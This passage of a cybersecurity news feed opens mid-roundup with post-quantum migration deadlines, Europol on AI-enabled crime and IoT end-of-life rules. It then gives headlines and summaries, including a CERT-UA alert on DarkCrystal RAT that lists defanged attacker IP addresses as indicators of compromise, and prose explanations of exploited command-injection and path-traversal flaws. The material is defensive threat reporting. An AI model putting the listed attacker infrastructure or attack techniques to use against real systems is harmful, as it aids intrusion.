“Migration to PQC can be viewed as any large technology transition. In the guidance, we describe the key steps in such a transition, and illustrate some of the cryptography and PQC-specific elements required at each stage of the programme,” reads a companion blog.

At a high level, these are the three main key milestones proposed by the NCSC:

By 2028
- Define the organization’s migration goals.
- Assess which services and infrastructure need to have their cryptography upgraded to PQC.
- Draft an initial migration plan that includes, for example, the highest priority migration steps; the necessary investment; and what you’ll need from your suppliers.

By 2031
- Execute the first, most important PQC migration steps.
- Refine the PQC migration plan to ensure the roadmap will be fulfilled.
- Ensure your infrastructure is ready to support PQC.

By 2035
- Complete your PQC migration.

The need to migrate to PQC stems from the ability quantum computers will have to decrypt data protected with today’s public-key cryptographic algorithms. These powerful quantum computers are expected to become generally available at some point between 2030 and 2040.

The U.S. National Institute of Standards and Technology (NIST) last year released three quantum-resistant algorithm standards that are ready to be adopted. A fourth one is slated for release next year, and a fifth one, announced last week, should be available in 2027.

For more information about how to protect your organization against the quantum computing cyberthreat:
- “How to prepare for a secure post-quantum future” (TechTarget)
- “Moody’s sounds alarm on quantum computing risk, as transition to PQC ‘will be long and costly’” (Industrial Cyber)
- “Companies Prepare to Fight Quantum Hackers” (The Wall Street Journal)
- “US unveils new tools to withstand encryption-breaking quantum. Here’s what experts are saying” (World Economic Forum)
- “Quantum is coming — and bringing new cybersecurity threats with it” (KPMG)
- “Quantum and the Threat to Encryption” (SecurityWeek)

3 - Europol: AI is transforming organized crime

Criminals are enthusiastically embracing AI, which helps them accelerate their malicious activities and operate more effectively.

So said Europol in its report “European Union Serious and Organised Crime Threat Assessment 2025: The changing DNA of serious and organised crime,” published this week.

“As AI-driven systems … become more advanced and user-friendly, criminal networks are increasingly leveraging their capabilities across a wide spectrum of crimes,” the report reads.

According to Europol, AI is “fundamentally reshaping” crime by:
- Drastically lowering the barriers to entry for digital crimes by allowing crooks to, for example, craft phishing messages in multiple languages, precisely target victims and craft sophisticated malware
- Allowing fraudsters to create sophisticated synthetic media, such as voice cloning and video deepfakes, to dupe victims, impersonate people and carry out blackmail
- Making crooks more effective by, for example, automating attacks, expanding their scope and scale, and bypassing security controls – all with fewer resources.

“To counter the growing threat of AI-enabled crime, policymakers, law enforcement agencies and the technology sector must collaborate to develop robust safeguards, consistent regulations and advanced detection tools,” the report reads.

For more information about how cybercriminals are leveraging AI:
- “How AI is making phishing attacks more dangerous” (TechTarget)
- “How AI agents help hackers steal your confidential data - and what to do about it” (ZDNet)
- “How cyber criminals are using artificial intelligence (AI) for online threats” (Government of Canada)
- “The near-term impact of AI on the cyber threat” (U.K. NCSC)
- “FBI Warns of Increasing Threat of Cyber Criminals Utilizing Artificial Intelligence” (FBI)

4 - Groups call for IoT end-of-life disclosure law

Manufacturers of internet-of-things (IoT) devices should be required by law to disclose the products they’re no longer supporting, so that customers are aware of the security risks those products pose.

That’s the opinion of Consumer Reports, the Center for Democracy and Technology, the U.S. Public Interest Research Group and the Secure Resilient Future Foundation, which recently proposed a model bill called the “Connected Consumer Products End of Life Disclosure Act.”

The bill would require IoT manufacturers and internet service providers (ISPs) to provide “clear and timely” information about their connected devices’ support lifecycles. “The proliferation of IoT devices in homes and businesses has created a significant security challenge. When these devices reach their end of life and no longer receive software and security updates, they become vulnerable to exploitation by malicious actors,” reads a joint statement from the groups.

Specifically, the groups want the law to require IoT manufacturers to:
- Clearly disclose for how long they’ll provide security and software updates, and to offer this support for a reasonable amount of time.
- Proactively alert customers when their devices are approaching end-of-life status and offer appropriate guidance.
- Offer details about features that will become inactive, and about potential vulnerabilities and security risks resulting from end-of-life status.

Moreover, the proposed model law would also put the onus on ISPs to remove from customers’ homes any devices they provided, such as routers, once those devices reach end-of-life status.

For more information about IoT and operational technology (OT) security, check out these Tenable resources:
- “How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)
- “How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform: The Importance of Contextual Prioritization” (blog)
- “How To Secure Your IT, OT and IoT Assets With an Exposure Management Platform: Complete Visibility with Asset Inventory and Discovery” (blog)
- “The Invisible Bridge: Recognizing The Risk Posed by Interconnected IT/OT/IoT Environments” (on-demand webinar)
- “How to Unlock Advanced IoT Visibility for Cyber-Physical Systems” (blog)
- “Unlock advanced IoT visibility to better secure your OT environment” (on-demand webinar)

5 - Report: Open source community must prep better for EU’s CRA law compliance

Open-source software manufacturers, project stewards and developers need to beef up on their knowledge of the European Union’s Cyber Resilience Act (CRA), a landmark cybersecurity law whose enforcement is expected to begin in late 2027.

That’s the main takeaway from the new report “Unaware and Uncertain: The Stark Realities of ‘Cyber Resilience Act’ Readiness in Open Source” from the Linux Foundation and the Open Source Security Foundation.

“This report highlights significant knowledge gaps and key strategies to help organizations meet regulatory obligations outlined in the CRA regarding secure software development, while preserving the collaborative and decentralized nature of open source,” Steve Fernandez, OpenSSF’s General Manager, said in a statement.

The report surveyed 685 respondents, most of them software developers, IT professionals and security professionals. It found that CRA awareness is low, with 62% of respondents saying they’re either “not familiar at all” or “slightly familiar” with the law. Even many respondents who are familiar with the CRA still lack a comprehensive grasp of its scope. For example, 42% of respondents haven’t determined if the law applies to them, and almost 60% aren’t aware of the non-compliance penalties. Furthermore, only 28% correctly said full CRA compliance begins in 2027.

Here are some key recommendations from the report:
- Manufacturers need to adopt a more proactive approach to securing their open source software dependencies by, for example, developing internal security controls and establishing formal contribution processes.
- Stewards should help “scale and standardize” cybersecurity practices and processes throughout the open source ecosystem. The CRA defines stewards as industry organizations, such as the OpenSSF, that support the development of open source software for commercial use.
- Regulatory agencies should provide clear guidance around the CRA so that open source players are clear about the scope and requirements of the law.

The Linux Foundation also released a complementary report titled “Pathways to Cybersecurity Best Practices in Open Source” that features cybersecurity best practices from three of the organization’s projects.

The CRA outlines cybersecurity requirements for the design, development, production and lifecycle maintenance of digital products – both hardware and software – including IoT wares such as connected cars.

For example, the CRA specifies a number of “essential cybersecurity requirements” for these products, including that they:
- Don’t ship with known exploitable vulnerabilities
- Have a “secure by default” configuration
- Can fix their vulnerabilities via automatic software updates
- Offer access protection via control mechanisms, such as authentication
- Protect the data they store, transmit and process

For more information and analysis about the EU’s Cyber Resilience Act:
- “Cyber Resilience Act Requirements Standards Mapping” (ENISA)
- “The Cyber Resilience Act, an Accidental European Alien Torts Statute?” (Lawfare)
- “EU Cybersecurity Regulation Adopted, Impacts Connected Products” (National Law Review)
- “Open source foundations unite on common standards for EU’s Cyber Resilience Act” (TechCrunch)
- “The Cyber Resilience Act: A New Era for Mobile App Developers” (DevOps.com)
- Video: “The EU Cyber Resilience Act: A New Era for Business Engagement in Open Source Software” (Linux Foundation)

6 - FBI: Beware of malicious file-converter tools

Cyber fraudsters are luring victims by offering free online tools for converting files into different formats, according to the U.S. Federal Bureau of Investigation.

While the tools work as advertised, they also perform malicious actions in the background, such as infecting the converted file with malware or stealing personal data from it, including banking information and Social Security numbers. In other scheme variations, the tools may offer to combine files into a single one – such as by consolidating multiple photos into one PDF file – or they may claim to be an MP3 or MP4 downloader.

“Unfortunately, many victims don’t realize they have been infected by malware until it’s too late, and their computer is infected with ransomware or their identity has been stolen,” reads the alert from the FBI’s Denver office.

The FBI recommends thinking twice about using free online tools that offer these functionalities and scanning all files you receive with anti-virus software.
by Tenable
2025-03-21 08:12:03
CERT-UA Warns of Escalating Cyberattacks Targeting Ukraine’s Defense Sector with DarkCrystal RAT

The Government Computer Emergency Response Team (CERT-UA) issued an important warning about a series of targeted cyberattacks aimed at employees within Ukraine's defense-industrial complex and members of the Armed Forces. These attacks have been tracked under the identifier UAC-0200, marking a concerning escalation in espionage activities leveraging the DarkCrystal RAT (DCRAT).

According to CERT-UA, the attacks, which have been ongoing since at least the summer of 2024, employ sophisticated tactics to gain unauthorized access to sensitive information. One of the primary techniques identified involves the use of the Signal messaging app, where malicious actors have been spreading messages disguised as meeting reports.

These deceptive messages often contain compressed archive files, which include a PDF document and an executable file, classified as DarkTortilla. The DarkTortilla file serves as a cryptor/loader designed to decrypt and launch the DarkCrystal RAT (DCRAT) on the infected system.

How the DarkCrystal RAT Works

DarkCrystal RAT (DCRAT) is a powerful remote access tool that allows cybercriminals to control infected systems from a distance. Once installed, it grants the attackers complete control over the victim's device, enabling them to exfiltrate sensitive information, manipulate data, and even deploy additional malicious payloads. The use of DarkTortilla as a loader is particularly concerning as it hides the malicious intent behind a seemingly innocuous file, making it more difficult for users to detect.

The CERT-UA team further emphasized that starting in February 2025, the focus of these attacks shifted toward topics related to unmanned aerial vehicles (UAVs) and electronic warfare systems. This shift suggests that the attackers are now targeting more specific defense technologies, likely to gather intelligence on Ukraine’s military capabilities.

Leveraging Social Engineering Tactics for Cyberattacks

One of the key features of these cyberattacks is the use of social engineering techniques to manipulate victims into opening malicious attachments. The use of Signal, a popular messaging platform, broadens the attack surface, providing cybercriminals with a relatively unregulated channel through which to spread their payloads. Messages often appear to come from trusted sources, such as colleagues or business partners, whose accounts have already been compromised. This method of attack makes it harder for traditional security systems to detect and block malicious activity, as the attackers exploit legitimate communication channels to deliver their payloads.

CERT-UA’s Ongoing Monitoring and Response

The CERT-UA team has been closely monitoring these threats, and they urge all individuals working in the defense sector to remain vigilant. In the event of receiving suspicious messages or files, CERT-UA encourages immediate reporting to the authorities through all available means.

As part of its ongoing efforts, CERT-UA has released a list of indicators of compromise (IOCs) to help organizations identify and respond to the threat. These IOCs include specific file hashes and network addresses associated with the attack. The listed files include archive files such as “Звіт 10.03.25.rar” and “Наказ 17.02.2025.pdf,” which contain the malicious executables linked to the DarkCrystal RAT.

The identified network addresses linked to the attacks include:
- 45[.]130.214.237
- 62[.]60.235.190
- 87[.]249.50.64
- 217[.]25.91.61
- 83[.]147.253.138

Additionally, there are several URLs associated with the compromised network infrastructure, which are used to facilitate the attack and maintain communication between the infected systems and the attackers' servers.

The UAC-0200 attack campaign highlights the growing cybersecurity risks faced by Ukraine's defense sector. The use of sophisticated malware like DarkCrystal RAT (DCRAT) highlights the need for stronger security, especially against social engineering tactics that exploit communication tools such as Signal. As cybercriminals become more advanced, constant vigilance and proactive cybersecurity measures are essential. CERT-UA’s ongoing monitoring plays a crucial role in managing these threats, but individuals must also stay alert and report suspicious activity. With cyberattacks becoming more advanced, it’s vital for both government and private sectors to collaborate in strengthening defenses to protect Ukraine’s defense infrastructure and national security.
by The Cyber Express
2025-03-21 06:08:13
MITRE ATT&CK T1562.007 Impair Defenses: Disable or Modify Cloud Firewall
Disable or Modify Cloud Firewall is a defense evasion technique that adversaries use to manipulate cloud-based firewall configurations to bypass security controls and enable malicious activity. Cloud firewalls, often implemented as security groups, network access control lists (NACLs), or virtual firewall appliances, are designed to regulate network traffic, prevent unauthorized access, and enforce segmentation within cloud environments. By disabling or modifying these protections, attackers can create unauthorized pathways for lateral movement, data exfiltration, and command-and-control (C2) communication.
by Picus Security
2025-03-21 02:00:11
GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment (Updated 3/21)
A compromise of the GitHub action tj-actions/changed-files highlights how attackers could exploit vulnerabilities in third-party actions to compromise supply chains.
by Palo Alto Networks - Unit42
2025-03-21 00:00:00
[webapps] Jasmin Ransomware - SQL Injection Login Bypass
by Exploit DB
2025-03-21 00:00:00
Trimarc Joins TrustedSec: Strengthening Our Commitment to Security
We’re excited to share some big news: Trimarc Security is now fully operating under TrustedSec! This marks a significant step forward in our mission to provide real-world security guidance to help our partners…
by TrustedSec
2025-03-20 21:13:02
Federal judge blocks DOGE’s access to Social Security Administration’s banks of personal information
The order accused DOGE of engaging in a "fishing expedition" at the federal agency.
by TechCrunch
2025-03-20 21:09:00
YouTube Game Cheats Spread Arcane Stealer Malware to Russian-Speaking Users
YouTube videos promoting game cheats are being used to deliver a previously undocumented stealer malware called Arcane likely targeting Russian-speaking users. "What's intriguing about this malware is how much it collects," Kaspersky said in an analysis. "It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla, and
by The Hacker News
2025-03-20 20:07:29
North Korea launches new unit with a focus on AI hacking, per report
North Korea is reportedly launching a new cybersecurity unit called Research Center 227 within its intelligence agency Reconnaissance General Bureau (RGB).
by TechCrunch
2025-03-20 20:05:51
VexTrio Using 20,000 Hacked WordPress Sites in Traffic Redirect Scheme
A massive cybercrime network known as "VexTrio" is using thousands of compromised WordPress sites to funnel traffic through a complex redirection scheme.
by Dark Reading
2025-03-20 20:01:08
University Competition Focuses on Solving Generative AI Challenges
The Amazon Nova AI Challenge puts student research to the test and aims to bring a new perspective to challenges arising from the increase in AI-assisted software development.
by Dark Reading
2025-03-20 19:13:00
Veeam and IBM Release Patches for High-Risk Flaws in Backup and AIX Systems
Veeam has released security updates to address a critical security flaw impacting its Backup & Replication software that could lead to remote code execution. The vulnerability, tracked as CVE-2025-23120, carries a CVSS score of 9.9 out of 10.0. It affects 12.3.0.310 and all earlier version 12 builds. "A vulnerability allowing remote code execution (RCE) by authenticated domain users," the
by The Hacker News
2025-03-20 18:40:40
Why It's So Hard to Stop Rising Malicious TDS Traffic
Cybersecurity vendors say threat actors' abuse of traffic distribution systems (TDS) is becoming more complex and sophisticated — and much harder to detect and block.
by Dark Reading
2025-03-20 18:04:18
Semrush impersonation scam hits Google Ads
The phishing campaign for valuable Google accounts continues with a new twist, going after the customers of a SaaS platform.
by Malwarebytes Labs
2025-03-20 18:00:14
Tomorrow, and tomorrow, and tomorrow: Information security and the Baseball Hall of Fame
In this week’s Threat Source newsletter, William pitches a fun comparison between baseball legend Ichiro Suzuki and the unsung heroes of information security, highlights newly released UAT-5918 research, and shares an exciting new Talos video.
by Cisco Talos Blog
2025-03-20 17:15:51
Hack The Box is recognized by Taiwan’s Administration for Cyber Security as an official certification provider
The HTB CDSA and HTB CPTS certifications have been officially added to the ACS’s list of cybersecurity professional certificates.
by Hack The Box Blog
2025-03-20 17:00:54
The future of MFA is clear – but is it here yet?
Not all authentication is equal to the task in 2025, but there is a best choice within reach
by Sophos News
2025-03-20 16:55:00
How to Protect Your Business from Cyber Threats: Mastering the Shared Responsibility Model
Cybersecurity isn't just another checkbox on your business agenda. It's a fundamental pillar of survival. As organizations increasingly migrate their operations to the cloud, understanding how to protect your digital assets becomes crucial. The shared responsibility model, exemplified through Microsoft 365's approach, offers a framework for comprehending and implementing effective cybersecurity
by The Hacker News
2025-03-20 16:41:35
Ukraine Defense Sector Under Attack via Dark Crystal RAT
The UNC-200 threat group, active since last summer, has been utilizing the Signal messaging app to social engineer targets into downloading an infostealing remote access Trojan.
by Dark Reading
2025-03-20 16:31:35
Fort Knox for Your Data: How Elasticsearch X-Pack Locks Down Your Cluster – Part 2
In Part 1 of Fort Knox for Your Data: How Elasticsearch X-Pack Locks Down Your Cluster, we uncovered the dangers of running Elasticsearch with X-Pack disabled, highlighting the ease with which attackers can exploit unauthenticated endpoints.
by SpiderLabs Blog
2025-03-20 16:26:00
Six Governments Likely Use Israeli Paragon Spyware to Hack IM Apps and Harvest Data
The governments of Australia, Canada, Cyprus, Denmark, Israel, and Singapore are likely customers of spyware developed by Israeli company Paragon Solutions, according to a new report from The Citizen Lab. Paragon, founded in 2019 by Ehud Barak and Ehud Schneorson, is the maker of a surveillance tool called Graphite that's capable of harvesting sensitive data from instant messaging applications
by The Hacker News
2025-03-20 16:10:54
MSP Training: How often and what kind?
According to Barracuda Network’s Evolving Landscape of the MSP 2024 report, 38% of managed service providers (MSPs) offer security awareness training (SAT). However, experts say that the percentage should be much higher.
by Barracuda
2025-03-20 16:04:27
Targeted spyware and why it’s a concern to us
Experts are warning about the proliferating market for targeted spyware and espionage. Why should we be concerned?
by Malwarebytes Labs
2025-03-20 16:04:18
Hackers are ramping up attacks using year-old ServiceNow security bugs to target unpatched systems
Threat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity
by TechCrunch
2025-03-20 16:03:23
Citizen Development: The Wrong Strategy for the Right Problem
GenAI is replacing citizen development. Here's why that's a good thing.
by ITPro Today
2025-03-20 15:30:00
Why Continuous Compliance Monitoring Is Essential For IT Managed Service Providers
Regulatory compliance is no longer just a concern for large enterprises. Small and mid-sized businesses (SMBs) are increasingly subject to strict data protection and security regulations, such as HIPAA, PCI-DSS, CMMC, GDPR, and the FTC Safeguards Rule. However, many SMBs struggle to maintain compliance due to limited IT resources, evolving regulatory requirements, and complex security challenges
by The Hacker News
2025-03-20 15:13:00
CISA Adds NAKIVO Vulnerability to KEV Catalog Amid Active Exploitation
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity security flaw impacting NAKIVO Backup & Replication software to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability in question is CVE-2024-48248 (CVSS score: 8.6), an absolute path traversal bug that could allow an unauthenticated attacker to
by The Hacker News
2025-03-20 15:05:00
U.S. Cyber Command Wraps Up Largest-Ever Cyber Guard Exercise
U.S. Cyber Command concluded the first phase of its 11th annual command exercise, Cyber Guard, on March 18, 2025. The U.S. Cyber Command Cyber Guard exercise, in coordination with the Joint Staff, is part of a larger joint force exercise series designed to simulate real-world scenarios, to enable participants to practice internal and external staff processes for total force integration.
by U.S. Cyber Command News
2025-03-20 14:38:02
UK Sets Deadline for Quantum Cryptography Migration to 2035
The UK’s National Cyber Security Centre (NCSC) has released detailed guidance on the transition to post-quantum cryptography (PQC), setting key target dates for organizations to complete their migration. The move is aimed at mitigating the future risks posed by quantum computers, which could render today’s encryption methods obsolete.
Quantum cryptography by 2035
The NCSC’s recommendations, …
by Cyber Insider
2025-03-20 14:28:47
Key Takeaways from the KnowBe4 2025 Phishing Threat Trends Report
Our latest Phishing Threat Trends Report explores the evolving phishing landscape in 2025, from renewed tactics to emerging attack techniques.
by KnowBe4
2025-03-20 14:27:52
Scammers Can Be Victims Too
There are thousands of people worldwide trying to scam you, hoping they can make you a victim, steal your money, and harm you in some way. While some of it is done by individuals or small gangs of people, a lot of it happens on an industrialized scale.
by KnowBe4
2025-03-20 14:27:20
Phishing Attacks Abuse Microsoft 365 to Bypass Security Filters
Threat actors are abusing Microsoft’s infrastructure to launch phishing attacks that can bypass security measures, according to researchers at Guardz.
by KnowBe4
2025-03-20 14:07:29
CISA Warns of Active Exploitation with Three New Vulnerabilities Added to KEV Catalog

One of the most concerning vulnerabilities in the new CISA catalog is CVE-2025-1316, which affects the Edimax IC-7100 IP Camera. This vulnerability, identified on March 4, 2025, is an OS Command Injection Vulnerability that allows attackers to execute arbitrary commands on the device remotely. The Edimax IC-7100 does not properly neutralize special characters used in OS commands, leaving it open to exploitation. Malicious actors can craft specific requests to inject malicious code into the camera’s operating system, leading to remote code execution and unauthorized access to the device.

The impact of this vulnerability is severe, as it enables attackers to gain control over the device, potentially accessing sensitive video surveillance data or compromising the network. A CVSS v4 score of 9.3 has been assigned to CVE-2025-1316, indicating the critical nature of the flaw. CISA strongly recommends that organizations using Edimax IC-7100 IP Cameras take immediate action to mitigate the risk, including network isolation, the use of firewalls, and the deployment of Virtual Private Networks (VPNs) to protect control systems from external threats.

CVE-2024-48248: Absolute Path Traversal Vulnerability in NAKIVO Backup and Replication

Another serious vulnerability added to CISA’s catalog is CVE-2024-48248, a Traversal Vulnerability in NAKIVO Backup and Replication. This flaw, which was discovered in March 2025, allows attackers to exploit the application’s handling of file paths, enabling them to access unauthorized directories on the system. This vulnerability is a classic case of absolute path traversal, where attackers can manipulate file paths to navigate outside the expected directory structure, potentially reading sensitive files and compromising the system’s security.

The flaw affects all versions of NAKIVO Backup and Replication prior to the patch release, and its exploitation can lead to data leakage or loss, exposing critical backup information. CISA emphasizes the importance of applying patches and updating to the latest software versions to prevent potential breaches. Organizations are advised to ensure proper access controls are in place and to regularly audit their systems for vulnerabilities related to path traversal.

CVE-2017-12637: Directory Traversal Vulnerability in SAP NetWeaver

The third vulnerability on CISA’s list is CVE-2017-12637, a Directory Traversal Vulnerability found in SAP NetWeaver, a widely used enterprise resource planning (ERP) system. This flaw, which was originally published in August 2017, has resurfaced in the context of ongoing exploitation. The vulnerability allows attackers to access arbitrary files by manipulating file paths in a web application’s query string, a technique known as directory traversal. In this case, the SAP NetWeaver Application Server Java 7.5 is vulnerable to exploitation via the UIUtilJavaScriptJS component. By sending specially crafted input that includes .. (dot dot) sequences, attackers can navigate outside the application’s root directory and access sensitive files on the underlying system.

Exploiting this flaw can lead to the disclosure of confidential information, and in some cases, the ability to execute further attacks on the system. CISA urges SAP NetWeaver users to immediately apply security patches to resolve this issue and recommends conducting thorough security reviews to prevent similar vulnerabilities from being overlooked in the future.

Conclusion

Addressing vulnerabilities such as CVE-2025-1316, CVE-2024-48248, and CVE-2017-12637 is important for protecting critical infrastructure and sensitive data from exploitation. Organizations must remain proactive in implementing mitigation strategies recommended by CISA, such as updating systems, securing access, and isolating vulnerable devices.

As the threat landscape evolves, the importance of leveraging advanced cybersecurity solutions cannot be overstated. Cyble, a leader in AI-driven cybersecurity, plays a crucial role in helping organizations stay protected from cyber adversaries. With its cutting-edge threat intelligence platforms, like Cyble Vision, Cyble empowers enterprises, government bodies, and law enforcement agencies to proactively detect and defend against cyber threats.

References
- https://www.cisa.gov/news-events/alerts/2025/03/19/cisa-adds-three-known-exploited-vulnerabilities-catalog
- https://www.cve.org/CVERecord?id=CVE-2025-1316
- https://www.cve.org/CVERecord?id=CVE-2024-48248
- https://www.cve.org/CVERecord?id=CVE-2017-12637
by CYBLE
2025-03-20 14:02:25
Hybrid Threats and AI Form the DNA of EU’s Organized Threat Landscape in 2025: Europol

Overview

Europol released the EU-SOCTA 2025 report, which offers a comprehensive look into the complex dynamics shaping serious and organized crime across Europe. Europol’s analysis provides insight into the increasing intersection of cybercriminal activities, hybrid threats, and the exploitation of emerging technologies. Criminals are rapidly adapting to digital advancements, using technology to expand their reach, enhance their capabilities, and evade law enforcement, the report said.

Hybrid Threats: A Blurring of Crime and Conflict

Hybrid threats, which combine conventional criminal methods with advanced digital strategies, present significant risks. These tactics destabilize societies, exploit critical infrastructures, and create uncertainty. Criminal organizations now leverage methods traditionally associated with state-backed actors, including disinformation campaigns, targeted cyberattacks, and manipulation of public opinion. By exploiting vulnerabilities of interconnected systems, these actors disrupt supply chains, compromise sensitive data, and manipulate information on a large scale.

The blending of state-backed espionage and organized crime blurs the line between geopolitical conflict and traditional crime, complicating attribution and response. The report stresses the need for closer collaboration between law enforcement, intelligence agencies, and cybersecurity experts to counter these multifaceted threats.

The Online Realm: A Breeding Ground for Organized Crime

Online platforms have become fertile grounds for organized crime. The digital economy offers anonymity and scalability, enabling criminals to engage in illegal activities with minimal physical risk. From trafficking illicit goods on the dark web to orchestrating complex cyberattacks, digital spaces facilitate sophisticated criminal networks.

The report notes the increasing use of encrypted communication platforms and private messaging applications, making monitoring and law enforcement efforts more challenging. These platforms are exploited to trade drugs, weapons, stolen data, and counterfeit products while facilitating human trafficking and exploitation. Additionally, online forums and marketplaces distribute cybercriminal tools like malware, ransomware-as-a-service, and exploit kits.

Technology as an Accelerator: AI and Emerging Innovations

Artificial intelligence (AI) and machine learning (ML) have significantly accelerated the capabilities of organized crime. Cybercriminals use AI-driven tools to automate attacks, bypass security mechanisms, and enhance phishing techniques, Europol noted. Deepfake technology, used for impersonation and disinformation, poses risks to financial institutions, law enforcement, and political stability. The report also warns of the misuse of AI for predictive policing, biometric spoofing, and large-scale data analysis to exploit vulnerabilities. Criminals use AI to analyze stolen data sets, identify high-value targets, and launch precision-based attacks, increasing their success rates.

The Financial Side: Money Laundering and Criminal Finances

Money laundering remains a critical aspect of organized crime, with criminals employing sophisticated techniques to conceal illicit gains. Cryptocurrencies and digital assets are popular for money laundering due to their pseudo-anonymity and the complexity of tracing transactions across multiple blockchain networks. The report identifies the misuse of virtual asset service providers (VASPs) for laundering money. Criminals utilize decentralized finance (DeFi) platforms to move illicit funds quickly, exploiting the lack of regulation and oversight. Shell companies and offshore accounts obscure the origins of criminal proceeds, challenging financial institutions and regulators.

Cyberattacks and Online Fraud: Old, Yet New Dimensions of Crime

Cyberattacks and online fraud have evolved from isolated incidents to well-coordinated, large-scale operations. Ransomware attacks, business email compromise (BEC), and phishing schemes increasingly target critical infrastructures, healthcare institutions, and multinational corporations. The report outlines the growth of ransomware-as-a-service (RaaS), where organized crime groups provide malware to affiliates, sharing profits from successful attacks. Cybercriminals exploit supply chain vulnerabilities, infiltrating service providers to compromise multiple targets simultaneously. Online fraud schemes like investment scams, identity theft, and credit card fraud have become more sophisticated. Cybercriminals use stolen data from breaches to create synthetic identities, making detection more difficult, Europol said.

Strengthening Resilience Against Evolving Threats

The EU-SOCTA 2025 report shows the need for a coordinated, multi-agency approach to combat these evolving threats. Enhanced collaboration between law enforcement, the private sector, cybersecurity professionals, and financial institutions is essential. Training and capacity-building for digital forensics, incident response, and intelligence analysis are crucial to adapting to the dynamic threat landscape. Efforts to implement stricter regulatory measures for cryptocurrencies, strengthen anti-money laundering (AML) frameworks, and enhance threat intelligence sharing across borders are vital steps toward countering organized crime. Public awareness campaigns and initiatives to educate businesses and individuals about cybersecurity best practices are equally important.

As the convergence of technology and crime continues, proactive measures and international cooperation are needed to mitigate the risks posed by hybrid threats and sophisticated cybercriminal networks. The EU-SOCTA 2025 report is a crucial resource for policymakers, security practitioners, and businesses seeking to navigate this increasingly complex security environment.

References:
- https://www.europol.europa.eu/media-press/newsroom/news/launch-of-eu-serious-and-organised-crime-threat-assessment-2025
- https://www.europol.europa.eu/cms/sites/default/files/documents/EU-SOCTA-2025.pdf
by CYBLE
2025-03-20 14:00:00
Canary in the Code: Alert()-ing on XSS Exploits
I’ve been a web application pentester for a while now and over the years must have found hundreds of cross-site scripting (XSS) vulnerabilities. Cross-site scripting is a notoriously difficult problem […]
by Black Hills Information Security
2025-03-20 14:00:00
Cloudflare named a leader in Web Application Firewall Solutions in 2025 Forrester report
Forrester Research has recognized Cloudflare as a Leader in The Forrester Wave™: Web Application Firewall Solutions, Q1 2025 report.
by Cloudflare
2025-03-20 14:00:00
Are We Closing the Gender Gap in Cybersecurity?
Answer: Nope. But let's look at the trends — because they matter for security.
by Dark Reading
2025-03-20 14:00:00
Redefining Breach and Attack Simulation (BAS) with BAS as a Service
Validate the effectiveness of security controls with NetSPI's Breach and Attack Simulation as a Service. Simulate real-world attacks, benchmark detection coverage, and improve defenses.
by NetSPI
2025-03-20 14:00:00
Catch Me If You Can: Rooting Tools vs The Mobile Security Industry
Our zLabs team dives into why rooting and jailbreaking are a significant threat for enterprises and much more.
by Zimperium
2025-03-20 13:44:14
HP Brings Quantum-Safe Encryption to Printers
HP's 8000 Series enterprise and commercial printers, which include Color LaserJet Enterprise MFP 8801, Mono MFP 8601, and LaserJet Pro Mono SFP 8501, will feature new quantum ASICs and endpoint controllers to protect them from future quantum attacks.
by Dark Reading
2025-03-20 13:23:40
Android Apps Use Bluetooth and WiFi Scanning to Track Users Without GPS
A new study reveals that thousands of Android apps covertly collect location data using Bluetooth and WiFi beacons, allowing continuous tracking and profiling of users without explicit consent. Researchers found that 86% of analyzed apps collect sensitive data, including device identifiers, GPS coordinates, and WiFi scan results, often circumventing Android’s privacy controls. The hidden tracking …
by Cyber Insider
2025-03-20 13:10:00
Introducing Cloudy, Cloudflare’s AI agent for simplifying complex configurations
Cloudflare’s first AI agent, Cloudy, helps make complicated configurations easy to understand for Cloudflare administrators.
by Cloudflare
2025-03-20 13:00:00
HTTPS-only for Cloudflare APIs: shutting the door on cleartext traffic
We are closing the cleartext HTTP ports entirely for Cloudflare API traffic. This prevents the risk of clients unintentionally leaking their secret API keys in cleartext during the initial request.
by Cloudflare
2025-03-20 13:00:00
Simplify allowlist management and lock down origin access with Cloudflare Aegis
Cloudflare Aegis provides dedicated egress IPs for Zero Trust origin access strategies, now supporting BYOIP and customer-facing configurability, with observability of Aegis IP utilization soon.
by Cloudflare
2025-03-20 13:00:00
Making Application Security simple with a new unified dashboard experience
We’re introducing a new Application Security experience in the Cloudflare dashboard, with a reworked UI organized by use cases, making it easier for customers to navigate and secure their accounts.
by Cloudflare
2025-03-20 13:00:00
Mobile Jailbreaks Exponentially Increase Corporate Risk
Both Android devices and iPhones are 3.5 times more likely to be infected with malware once "broken" and 250 times more likely to be totally compromised, recent research shows.
by Dark Reading
2025-03-20 12:56:57
Product of the Year! AVLab honors ThreatDown Endpoint Protection
ThreatDown Endpoint Protection has been awarded AVLab's Product of the Year for the third consecutive year.
by ThreatDown
2025-03-20 12:13:00
GitHub Action compromise linked to previously undisclosed attack
Researchers uncovered a March 11 incident that may have led to the larger supply chain attack.
by Cybersecurity Dive
2025-03-20 12:06:31
New KnowBe4 Report Reveals a Spike in Phishing Campaigns
KnowBe4, Security Awareness Training leader, today launched its Phishing Threat Trend Report, detailing key trends, new data, and threat intelligence insights surrounding phishing threats targeting organisations at the start of 2025. Based on data generated by KnowBe4 Defend, this edition highlights the growing threat of ransomware and explores how cybercriminals are using sophisticated tactics to […] The post New KnowBe4 Report Reveals a Spike in Phishing Campaigns appeared first on IT Security Guru.
by IT Security Guru
2025-03-20 11:55:00
Choosing the Right Cloud Security Provider: Five Non-Negotiables for Protecting Your Cloud
Protecting your cloud environment for the long term involves choosing a security partner whose priorities align with your needs. Here's what you need to know.
As organizations embrace multi-cloud and hybrid environments, the complexity of securing that landscape increases. However, the overlooked risks may not come solely from threat actors. Choosing a security provider that has conflicting priorities can also introduce risk. The best cloud security program is built on independence, transparency and aligned priorities around your security needs. Here are five critical considerations for choosing the right security provider to protect your organization — and your cloud strategy — for the long term.
1. Checks and balances are essential
